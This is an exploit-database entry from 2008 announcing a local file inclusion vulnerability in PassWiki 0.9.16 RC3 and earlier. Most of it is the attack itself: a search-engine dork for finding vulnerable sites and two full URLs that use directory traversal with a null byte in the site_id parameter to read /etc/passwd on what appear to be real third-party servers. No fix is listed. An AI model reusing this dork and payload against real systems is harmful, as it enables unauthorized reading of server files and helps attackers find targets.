PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability

2008-05-31 00:00:00

dork: "powered by PassWiki"
example:
http://w3.funsrv.com/~konjo/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://inajob.no-ip.org/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00


author:[email protected]
http://rstzone.org

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.